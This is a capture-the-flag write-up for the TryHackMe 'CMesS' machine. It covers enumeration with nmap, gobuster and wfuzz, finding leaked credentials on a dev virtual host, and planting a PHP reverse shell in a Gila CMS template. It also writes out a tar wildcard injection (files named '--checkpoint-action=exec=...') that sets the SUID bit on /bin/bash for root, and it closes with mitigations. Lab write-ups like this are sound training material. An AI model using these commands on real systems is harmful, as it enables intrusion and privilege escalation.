*️THM - CMesS
Discovering a virtual host that leads to a compromised CMS with subsequent sudo privesc.
Reconnaissance
After booting up the target and adding cmess.thm to the /etc/hosts we find two open ports with our portscanner of trust:
portcatFollowing up on that with a more verbose nmap scan we can quickly rule out ssh as a point of entry - which leaves us with a single web port.
sudo nmap -A -p22,80 --script=default,vuln cmess.thmPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
| 256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_ 256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
[REDACTED for brevity]
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /blog/: Blog
| /admin/: Possible admin folder
| /admin/admin/: Possible admin folder
[REDACTED for brevity]
| /login/: Login page
| /robots.txt: Robots file
[REDACTED for brevity]
| /admin/environment.xml: Moodle files
| /0/: Potentially interesting folder
| /1/: Potentially interesting folder
| /author/: Potentially interesting folder
| /index/: Potentially interesting folder
|_ /search/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=cmess.thm
| Found the following possible CSRF vulnerabilities:
|
| Path: http://cmess.thm:80/
| Form id:
|_ Form action: http://cmess.thm/
| http-robots.txt: 3 disallowed entries
|_/src/ /themes/ /lib/
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
[REDACTED for brevity]
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
|_ PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT*
|_http-generator: Gila CMS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 39.50 ms 10.9.0.1
2 40.42 ms cmess.thm (10.10.25.197)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 336.25 seconds
It appears that we've got a webserver running on port 80 hosting a CMS called GilaCMS.
Service Enumeration
Starting off with some manual enumeration, http://cmess.thm does not seem to contain much. We do find a reference to the CMS creators and a single "Hello World" post but that's about it. Running gobuster yields quite a few routes though:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://cmess.thm//.hta (Status: 403) [Size: 274]
/.htaccess (Status: 403) [Size: 274]
/.htpasswd (Status: 403) [Size: 274]
/0 (Status: 200) [Size: 3851]
/01 (Status: 200) [Size: 4078]
/1 (Status: 200) [Size: 4078]
/1x1 (Status: 200) [Size: 4078]
/about (Status: 200) [Size: 3353]
/About (Status: 200) [Size: 3339]
/admin (Status: 200) [Size: 1580]
/api (Status: 200) [Size: 0]
/assets (Status: 301) [Size: 318] [--> http://cmess.thm/assets/?url=assets]
/author (Status: 200) [Size: 3590]
/blog (Status: 200) [Size: 3851]
/category (Status: 200) [Size: 3862]
/cm (Status: 500) [Size: 0]
/feed (Status: 200) [Size: 735]
/fm (Status: 200) [Size: 0]
/index (Status: 200) [Size: 3851]
/Index (Status: 200) [Size: 3851]
/lib (Status: 301) [Size: 312] [--> http://cmess.thm/lib/?url=lib]
/log (Status: 301) [Size: 312] [--> http://cmess.thm/log/?url=log]
/login (Status: 200) [Size: 1580]
/robots.txt (Status: 200) [Size: 65]
/search (Status: 200) [Size: 3851]
/Search (Status: 200) [Size: 3851]
/server-status (Status: 403) [Size: 274]
/sites (Status: 301) [Size: 316] [--> http://cmess.thm/sites/?url=sites]
/src (Status: 301) [Size: 312] [--> http://cmess.thm/src/?url=src]
/tag (Status: 200) [Size: 3874]
/tags (Status: 200) [Size: 3139]
/themes (Status: 301) [Size: 318] [--> http://cmess.thm/themes/?url=themes]
/tmp (Status: 301) [Size: 312] [--> http://cmess.thm/tmp/?url=tmp] Amongst some forbidden and uninteresting paths, we do find a login panel at /admin/. Since the room description on TryHackMe states that "no brute forcing is required" one of the first things we can try is to google for default credentials.
Not having found any, whilst on google, we can also search for known vulnerabilities (utilizing searchsploit as well). We discover a few exploits that require authentication and one unauthenticated remote code execution for Gila CMS < 2.0.0.
However, so far we've not been able to reliable discover the exact version of the CMS and after modifying the exploit for our linux target it does not appear to work.
As part of more enumeration we can also test for subdomains or rather virtual hosts (vhosts) on the target using wfuzz:
wfuzz -c -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 290********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://cmess.thm/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000019: 200 30 L 104 W 934 Ch "dev"
Total time: 0
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 0
So there appears to be something different at: dev.cmess.thm. Adding this to the /etc/hosts we can access the development log:
We found credentials for the andre user.
Initial Access
Using these credentials on the admin panel we discovered earlier we are now authorized:
From here on we could attempt to use an exploit or, and that seems a bit easier, just modify one of the template pages (e.g. the footer.php) and inject a php reverse shell (such as this one).
Reloading any page on http://cmess.thm will spawn us a shell in our listener as the www-data user.
www-data via php reverse shellPrivilege Escalation
As www-data we unfortunately don't have sudo permissions nor access to other users home directories. However, we can see that the user andre exists and while looking for scheduled jobs on the machine we also find an interesting cronjob:
rootIn order to abuse that cronjob we'll have to become andre first though. After looking at running processes and SUID binaries we come across an interesting file with very lax permissions:
We were lucky that this file wasn't hidden very well but otherwise a script such as linpeas or a special find would have done the work for us.
Now as andre we have access to the backup directory in our home folder and can exploit the cronjob. For those who haven't seen this tar wildcard exploitation before: a mix of GTFOBins and google will teach you that we can create files with names such as --checkpoint=1 that will be caught by the wildcard (*) and then interpreted as actual flags to the tar command. Since the command runs as root we can (for example) simply craft flags that will add the SUID bit to /bin/bash for easy privilege escalation. Here are the commands:
cd /home/andre/backup
touch ./--checkpoint=1
touch ./--checkpoint-action=exec=bash\ exec.sh
echo chmod +s /bin/bash > exec.sh
chmod +x exec.shWe saw the */2 in the crontab which means that the job will run once every 2 minutes. So after waiting a short period of time, we should be able to see that the permissions of /bin/bash have been altered:
tar with wildcardNow we simply execute /bin/bash with the -p flag (to disable the privilege squashing) and gain root access:
root flagSubmit the final flag and enjoy root.
Mitigations
Although these challenges aren't aimed at being perfectly realistic, it's always interesting to enumerate the weaknesses that led to the full compromise of the system. So here's what i think were the main issues that would need to be addressed:
Accessible development server -> this should most likely be an internal server and even then at least be secured
Cleartext depiction of sensitive information -> although this goes together with the first point, sensitive information, especially passwords should not be sent or stored in cleartext (if at all)
Admin access on the CMS -> if not absolutely necessary,
andreshould not be an administrator on the CMS, i.e. apply principle of least privilegeUnsafe permissions -> backup files should not be readable by everyone and scheduled tasks should only run with the least required privileges
Last updated
Was this helpful?